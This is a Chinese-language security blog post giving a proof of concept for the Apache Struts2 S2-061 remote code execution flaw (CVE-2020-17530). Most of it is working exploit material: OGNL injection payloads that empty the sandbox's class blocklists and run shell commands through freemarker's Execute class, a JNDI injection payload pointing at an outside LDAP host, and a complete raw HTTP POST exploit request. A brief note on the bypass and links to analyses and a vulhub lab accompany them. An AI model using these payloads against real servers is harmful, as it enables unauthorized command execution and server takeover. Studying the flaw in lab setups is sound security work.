Struts2 s2-061 Poc (CVE-2020-17530)

# Struts2 s2-061 Poc (CVE-2020-17530)

这个洞没那么严重,其实就是s2-059绕过,大家别想多

发散思维一下,这个beanMap类似于fastjson的命令执行。所以也可以构造一个jndi注入嘛 com.sun.rowset.JdbcRowSetImpl 也存在无参构造方法 DatasourceName也可以通过beamMap去操作

“`
public void setDataSourceName(String var1) throws SQLException {
if (this.getDataSourceName() != null) {
if (!this.getDataSourceName().equals(var1)) {
super.setDataSourceName(var1);
this.conn = null;
this.ps = null;
this.rs = null;
}
} else {
super.setDataSourceName(var1);
}

}
“`

最后通过getAutoCommit触发jndi注入

“`
public boolean getAutoCommit() throws SQLException {
return this.conn.getAutoCommit();
}
“`

jndi payload

“`
%{(‘Powered_by_Unicode_Potats0,enjoy_it’).(#UnicodeSec = #application[‘org.apache.tomcat.InstanceManager’]).(#rw=#UnicodeSec.newInstance(‘com.sun.rowset.JdbcRowSetImpl’)).(#rw.setDataSourceName(‘ldap://192.168.3.254:10086/UnicodeSec’)).(#rw.getDatabaseMetaData())}
“`

命令执行payload

“`
%{(‘Powered_by_Unicode_Potats0,enjoy_it’).(#UnicodeSec = #application[‘org.apache.tomcat.InstanceManager’]).(#potats0=#UnicodeSec.newInstance(‘org.apache.commons.collections.BeanMap’)).(#stackvalue=#attr[‘struts.valueStack’]).(#potats0.setBean(#stackvalue)).(#context=#potats0.get(‘context’)).(#potats0.setBean(#context)).(#sm=#potats0.get(‘memberAccess’)).(#emptySet=#UnicodeSec.newInstance(‘java.util.HashSet’)).(#potats0.setBean(#sm)).(#potats0.put(‘excludedClasses’,#emptySet)).(#potats0.put(‘excludedPackageNames’,#emptySet)).(#exec=#UnicodeSec.newInstance(‘freemarker.template.utility.Execute’)).(#cmd={‘whoami’}).(#res=#exec.exec(#cmd))}
“`

via:

https://mp.weixin.qq.com/s/skV6BsARvie33vV2R6SZKw

分析可以参考:

* https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247485085&idx=1&sn=f264cf31bb82ae957fb985b754890d41&chksm=f9ee6a22ce99e3349b94ef75f77e3c8dadf4ebf47a74921a547429d5180deba122f9593beefc&scene=132#wechat_redirect
* https://mp.weixin.qq.com/s/skV6BsARvie33vV2R6SZKw

VULHUB Struts2 S2-061:

https://github.com/vulhub/vulhub/tree/master/struts2/s2-061

PoC:

“`
POST /index.action HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 848

——WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name=”id”

%{(#instancemanager=#application[“org.apache.tomcat.InstanceManager”]).(#stack=#attr[“com.opensymphony.xwork2.util.ValueStack.ValueStack”]).(#bean=#instancemanager.newInstance(“org.apache.commons.collections.BeanMap”)).(#bean.setBean(#stack)).(#context=#bean.get(“context”)).(#bean.setBean(#context)).(#macc=#bean.get(“memberAccess”)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(“java.util.HashSet”)).(#bean.put(“excludedClasses”,#emptyset)).(#bean.put(“excludedPackageNames”,#emptyset)).(#arglist=#instancemanager.newInstance(“java.util.ArrayList”)).(#arglist.add(“echo ‘forum.ywhack.com'”)).(#execute=#instancemanager.newInstance(“freemarker.template.utility.Execute”)).(#execute.exec(#arglist))}
——WebKitFormBoundaryl7d1B1aGsV2wcZwF–
“`

![](/static/lingjiao/media/16096803266898/16096804259304.jpg)

![](/static/lingjiao/media/16096803266898/16096804320786.jpg)

ref:

https://forum.ywhack.com/thread-114788-1-2.html

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容